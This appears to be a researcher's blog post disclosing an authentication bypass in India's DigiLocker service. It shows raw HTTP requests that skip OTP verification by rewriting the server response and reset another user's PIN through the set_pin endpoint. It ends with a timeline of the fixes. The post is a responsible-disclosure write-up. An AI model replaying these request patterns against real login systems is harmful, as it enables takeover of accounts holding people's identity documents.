How I got access to 38M+ DigiLocker accounts

Impact

Backstory

So the story starts when my father wanted to upload all my personal documents to DigiLocker as through that we don’t have to carry our original documents to trains or airports for verification. There are currently 389 different types of documents that are officially supported by DigiLocker (Aadhaar Card, Driving License, etc.,) but of course, you can upload more documents as the given locker space is 1GB allocated to each user. I was little skeptical doing this because the history has shown that there have been numerous instances when the Aadhaar document along with other documents have been leaked because of improper security implementation.

Analysis

So I started to have a look how the authentication mechanism is implemented.

Sign in request
Correct PIN gives back the username
Incorrect PIN response
Incorrect PIN cannot request the Aadhaar profile
OTP during sign up process
Random OTP
OTP verification request
OTP verification response
{"status":"success","username":"xxxxxxxx"}
POST /signup/set_pin HTTP/1.1
Host: accounts.digitallocker.gov.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://accounts.digitallocker.gov.in
Connection: close
Referer: https://accounts.digitallocker.gov.in/signup
Cookie: SRVNAME=S4; fpdglckr=; DLOCKER=<redacted>
&pin=xxxxxx&txn=<username>&flow=signup

Extra Weirdness

As we remember when we bypass the OTP and modify the response it looked like this:

{"status":"success"}
POST /signup/set_pin HTTP/1.1
Host: accounts.digitallocker.gov.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://accounts.digitallocker.gov.in
Connection: close
Referer: https://accounts.digitallocker.gov.in/signup
Cookie: SRVNAME=S4; fpdglckr=; DLOCKER=<redacted>
&pin=xxxxxx&txn=undefined&flow=signup

Disclosure

  • 2020/05/16: Reported technical details to DigiLocker
  • 2020/05/18: DigiLocker fixes PIN bypass
  • 2020/06/01: DigiLocker fixes OTP bypass

Credits

Thank you my friend Osanda for proof reading :)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store